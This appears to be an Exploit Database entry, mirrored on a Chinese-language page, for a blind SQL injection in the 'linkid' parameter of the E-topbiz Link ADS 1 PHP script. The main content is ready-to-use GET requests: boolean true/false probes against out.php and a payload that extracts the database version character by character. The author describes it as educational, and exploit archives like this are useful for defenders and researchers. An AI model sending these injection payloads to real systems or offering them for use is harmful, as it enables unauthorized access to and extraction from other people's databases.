E-topbiz Link ADS 1 PHP script – ‘linkid’ Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： JosS
  日期： 2010-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11638/

• # E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability
  # url: http://e-topbiz.com/oprema/pages/linkads1.php
  #
  # Author: Jose Luis Gongora Fernandez 'aka' JosS
  # mail: sys-project[at]hotmail[dot]com
  # site: http://hack0wn.com
  # team: Spanish Hackers Team - [SHT]
  #
  # This was written for educational purpose. Use it at your own risk.
  # Author will be not responsible for any damage.
  #
  # Greetz To: All Hackers!
  
  proof of concept:
  GET /out.php?linkid=50+and+1=1 (true)
  GET /out.php?linkid=50+and+1=2 (false)
  
  exploit :
  GET /out.php?linkid=50+and+substring(@@version,1,1)=4
  GET /out.php?linkid=50+and+substring(@@version,1,1)=5
  
  
  # _h0_